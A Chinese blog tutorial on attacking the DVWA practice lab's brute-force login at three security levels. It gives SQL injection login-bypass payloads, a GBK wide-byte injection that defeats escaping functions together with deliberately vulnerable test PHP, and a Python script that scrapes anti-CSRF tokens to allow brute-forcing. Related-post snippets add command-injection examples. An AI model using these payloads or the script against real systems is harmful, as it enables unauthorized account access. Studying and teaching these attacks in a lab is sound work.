DVWA——改GBK尝试宽字节注入(brute教程)

最新推荐文章于 2025-03-21 21:43:33 发布
原创 最新推荐文章于 2025-03-21 21:43:33 发布 · 609 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了在DVWA平台上进行不同安全级别爆破攻击的方法,包括low、medium和high等级的漏洞利用技巧,展示了如何使用burpsuite进行密码爆破,并提供了宽字节注入和token校验绕过的具体步骤。

DVWA教程——爆破brute force

1、low等级

ps:加入echo $query 方便测试
输入admin/admin,查看$query结果

SELECT * FROM `users` WHERE user = 'admin' AND password = '21232f297a57a5a743894a0e4a801fc3'; 

// Get username
    $user = $_GET[ 'username' ];
    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );
$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

没有对GET提交的username、password进行任何过滤,直接带入数据库进行查询,可进行注入
payload:
?username=admin’%23&password=&Login=Login

SELECT * FROM `users` WHERE user = 'admin'#' AND password = 'd41d8cd98f00b204e9800998ecf8427e';

?username=admin%27–+%2B&password=&Login=Login

SELECT * FROM `users` WHERE user = 'admin'-- +' AND password = 'd41d8cd98f00b204e9800998ecf8427e';

使用burp的intruder功能对密码进行爆破
在这里插入图片描述
在这里插入图片描述

2、medium等级

<?php
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    echo $query;

mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。查看转义效果:

SELECT * FROM `users` WHERE user = 'admin\'*/\"' AND password = 'c4ca4238a0b923820dcc509a6f75849b';

语法:

mysqli_real_escape_string(connection,escapestring);
参数描述
connection必需。规定要使用的 MySQL 连接。
escapestring必需。要转义的字符串。编码的字符是 NUL(ASCII 0)、\n、\r、\、’、" 和 Control-Z。

过滤的单引号、双引号不能注入,那就用burpsuite进行爆破,方法与前面相同

宽字节注入绕过

据说如果mysql的默认编码为GBK,可以绕过mysqli_real_escape_string/addslashes函数的过滤,自己修改下mysql设置,编写php代码测试一下
addslashes函数的语法:

addslashes ( string $str ) : string

addslashes函数的作用:
返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(’)、双引号(")、反斜线(\)与 NUL(NULL 字符)。

(1)修改mysql默认编码设置

参考教程:MySql5.7.18字符集配置图文实例分享

我用的是phpstudy2018版,mysql版本为5.5.53,用命令修改编码不能成功,直接从my.ini下手

[client]
#default-character-set=utf8mb4
default-character-set=gbk
port=3306
[mysql]
#default-character-set=utf8mb4
default-character-set=gbk

phpstudy2018的mysqld下不能设置default-character-set=gbk,否则无法重新启动mysql,测试phpstudy2016发现改my.ini也没有用。

修改后查看默认编码

show variables like "%character_set_%";

在这里插入图片描述
修改dvwa数据库的默认编码
alter database dvwa character set gbk;
查看修改结果:
show create database dvwa;
在这里插入图片描述
同理修改数据表user的默认编码
alter table ‘users’ default character set gbk;
查看修改结果:
show create table users;在这里插入图片描述
将medium.php单独拿出来,修改部分代码可以实现宽字节注入本地复现,在medium.php前两行加入下面代码测试宽字节注入:
注意:将该文件放在根目录下测试才能成功

$GLOBALS["___mysqli_ston"]=mysqli_connect('127.0.0.1','root','root','dvwa',3306);
mysqli_query($GLOBALS["___mysqli_ston"],  "SET NAMES 'gbk'" );
(2)编写测试代码

宽字节注入原理及本地复现参考教程:Hr-Papers|宽字节注入深度讲解
使用dvwa数据库编写测试代码:

<?php
//连接数据库部分,注意使用了gbk编码
header('Content-Type:text/html;charset=gb2312');
 $conn = mysqli_connect('localhost', 'root', 'root','dvwa') or die('bad!');
 mysqli_query($conn,"SET NAMES 'gbk'");

 //执行sql语句
 $user = isset($_GET['user']) ? addslashes($_GET['user']) : 'admin';
 //$user = isset($_GET['user']) ? mysqli_real_escape_string($conn,$_GET['user']) : 'admin';
 $sql = "SELECT * FROM users WHERE user='{$user}'";
 echo $sql;
 echo "\n";
 $result = mysqli_query($conn,$sql) or die(mysqli_error($conn));
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<title>宽字节测试</title>
</head>
 <?php
if( $result && mysqli_num_rows( $result ) == 1 ){
    $row = mysqli_fetch_array($result, MYSQLI_ASSOC);
    echo "<h2>{$row['user']}</h2><p>{$row['password']}<p>\n";
}
else{
    echo "<p>"."user or password error!"."<p>\n";
}
mysqli_close($conn);
?>
</body>
</html>

payload:
?user=admin%df%27%20–%20+
使用mysqli_real_escape_string过滤的结果:
在这里插入图片描述
使用addslashes过滤的结果:
在这里插入图片描述

3、high等级

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();
?>

新增token校验和stripslashes()函数过滤

stripslashes定义和用法
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
提示:该函数可用于清理从数据库中或者从 HTML 表单中取回的数据。
没有趁手的工具,自己来用python来爆破一波

获取token脚本
#coding:utf-8
import requests
import re

url='http://192.168.78.1/dvwa/vulnerabilities/brute/'
headers={
"Host":"192.168.78.1",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding":"gzip, deflate",
"Referer":"http://192.168.78.1/dvwa/security.php",
"Connection":"keep-alive",
"Cookie":"security=high; PHPSESSID=ke27qaiipg1rghvda1hgu4td86",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
s=requests.session()
res=s.get(url=url,headers=headers,timeout=10)
# print(res.text)
html_res=res.text
pattern=r'\Suser_token\S\svalue=\S(.*)\S\s/>'
p=re.compile(pattern)
user_token=p.findall(html_res)[0]
print(user_token)
user='admin'
pwd='password'
params={'username':user,'password':pwd,'Login':'Login','user_token':user_token}
bruteres=s.get(url=url,headers=headers,params=params,timeout=10)
print(len(bruteres.text))
print(bruteres.text)

这里没有加载字典进行爆破,只用了正确的账号密码进行了登陆,关键在获取token,相关加载字典爆破代码可以参照我另一篇文章《Python 验证码 crunch|狼组CTF题 有验证码后台账号密码爆破》

宽字节注入
weixin_45253622的博客
03-18 6760
宽字节注入 漏洞原理 宽字节注入是由于不同编码中中英文所占字符的不同所导致的。 通常来说,在GBK编码当中,一个汉字占用2个字节。而UTF-8编码中,一个汉字占用3个字节。 在一般的sql注入时,参数id=1在数据库查询时是被单引号包围的。当传入id=1’时,传入的单引号又被转义符(反斜线)转义,导致参数ID无法逃逸单引号的包围,所以在一般情况下,此处是不存在sql注入漏洞的。 不过有个特例,就是当数据库的编码是GBK时,可以使用宽字节注入宽字节的格式是在地址后先加一个%df ,再加单引号,因为反斜杠的编
DVWA之命令注入
qq_36915061的博客
11-28 433
LOW 最简单的命令注入型似SQL注入,即在一个命令的后面添加非法输入,导致服务器执行正常语句的同时,也执行的后面的入侵语句. 例如,该条命令为ping,需要输入ip地址,127.0.0.1为正常输入,后面的& ls为非法输入 low级别的命令注入由于无任何过滤,所以简单的将入侵语句连接在正常语句后即可. 语句连接方式: A & B 前一个命令先执行不论是否...
SQL注入宽字节注入,sql注入到getshell,sqlmap注入的使用)和XSS漏洞(存储型)实战练习(DVWA靶场)
最新发布
m0_74292210的博客
03-21 784
因为网站会把用户输入的'前面加\进行处理,\会被编码为%5c,但是在查询中把%df和%5c通过GBK编码为汉字。在我们的请求里面,网站已经把我们输入的%编码为了%25,不能达到我们的目的,所以手动修数据包。发现name做了长度限制,可以通过抓包或者前端html来绕过。然后发现name做了<script>的替换,然后可以开始绕过。发现方法有效,该点存在宽字节注入漏洞,然后开始正式爆破。所以在'前加一个%df就可以把网站给我们加的\给绕过。过滤,绕不过去,只能从name注入。数据库名为pikachu。
DVWA注入
m0_52380854的博客
05-28 141
注入—low 没有过滤 设置low级别直接输入127.0.0.1 127.0.0.1 && ipconfig 注入——medium 将:&&过滤 127.0.0.1 & ipconfig 只有一个:& 左边不成功也会执行右边 注入——high 过滤了很多字符 输入127.0.0.1 |ipconfig 区别: 1.没有做过滤 2.做了基础过滤 3.作了比较强的过滤 4.从逻辑上了,将IP分为四个部分,且都为数字 ...
盲注、报错注入宽字节注入、堆叠注入学习笔记
qq_42562304的博客
06-15 1094
基于布尔的盲注: 传入“”错误“”参数和“正确”参数,观察页面是否发生了变化。 基于时间的盲注: 有些数据库对错误信息做了安全配置,是的无法通过以上方式(即页面返回的真假)探测注入点。此时,可以通过设置sleep语句(延迟多长时间,判断后台执行的时间)来探测注入点,称为基于时间的盲注。 补充函数: ASCII码对照表: 判断DVWA靶场盲注这关的库名: 可以判断为基于布尔的盲注。以下为通过ascii函数爆库名: 说明库的第一个字符ascci码为100,查表后得到第一个字符为d。重复以上步骤,可以得出当前
gbktest.rar
09-04
DVWA——GBK尝试宽字节注入(brute教程)》文章中参照和自编的宽字节注入测试代码。为了测试DWVA中brute项目的medium等级的宽字节注入,学会了命令行变数据库、数据表的字符编码,学会如何编写数据库连接代码,...
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWA、Pikachu)
ISNS的博客
04-21 1832
最近和同学聊天: 是我太菜。
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3400
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
渗透测试实战指南笔记
weixin_67830340的博客
04-07 2345
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8965
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
gbk双字节注入
左手诗人 右手剑客
06-12 421
&lt;?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
DVWA命令注入(Command_Injection)出现乱码
09-02 518
DVWA第二个模块Command Injection命令行注入 需要输入IP地址以及构造命令语句实现注入,但是输入之后显示如下乱码,傻傻分不清楚 解决方法: 1.找到C:\phpstudy\WWW\DVWA-master\dvwa\includes 2.打开文件dvwaPage.inc.php,修第277行,由utf-8为GB2312,保存 ...
利用GBK双字节编码突破PHP单引号转义限制进行SQL注入
Exploit的小站~
04-11 3171
今天看了黑防2009精华本下册《双字节编码:PHP的隐形杀手》一文,深受启发。 当php.ini中magic_quotes_gpc被设置为on时,提交的参数会被转义,例如,单引号会被转义成了'。一下子截断了字符型注入的路。 GBK双字节编码:一个汉字用两个字节表示,首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F),刚好涵盖了对应的编码0x5C。 0xD5 0
web常见漏洞解析 注入 xss csrf 文件上传 文件包含 -dvwa演示
joke_ljh的博客
09-14 1664
1.注入 1.1 SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 手工注入:联合注入、盲注、延...
DVWA乱码解决方法
qq_42527761的博客
08-07 986
DVWA测试过程中,回显出来的信息都是乱码。 找到目录下的这个文件 全文查找charset=utf-8,将所有utf-8修为gb2312。 问题解决。
报错注入宽字节注入测试真实网站步骤
a126976的博客
04-07 613
1.先输入1'判断是否存在漏洞,若产生报错,即代表很有可能存在漏洞,然后使用1 and 1=1,1 and 1=2,1' and '1' ='1,1' and '1'='2来判断注入类型(此判断和联合查询一样,但布尔盲注和时间盲注是另两种判断方式)这里补充一个函数:concat(),与前者group_concat不一样,是两种不同的作用,它的标准格式是concat(1,2,3),目的将这三个字符串无缝拼接起来。第二个参数代表所要查询的内容,前面的1和末尾的3不用深度理解,可以理解为拿来凑数的。
2024年黑客入门教程从零基础入门到精通,看完这一篇就够了(1),满满干货指导
2401_84297796的博客
05-07 737
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
DVWA —— Brute Force 暴力破解
YouTheFreedom的博客
05-20 2894
由于没有对登录页面进行相关的防暴力破解机制,如无验证码、有验证码但验证码未在服务器端校验以及无登录错误次数限制等,导致攻击者可通过暴力破解获取用户登录账户及口令,从而获取网站登录访问权限
DVWA教程:SQL注入漏洞案例研究
"DVWA之SQL注入教程" 在2020年12月6日的一篇文章中,作者lll-yz探讨了如何通过DVWA(Damn Vulnerable Web Application)平台进行SQL注入学习。DVWA是一个用于教育和测试Web安全的开源工具,而本文着重于其中的SQL...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值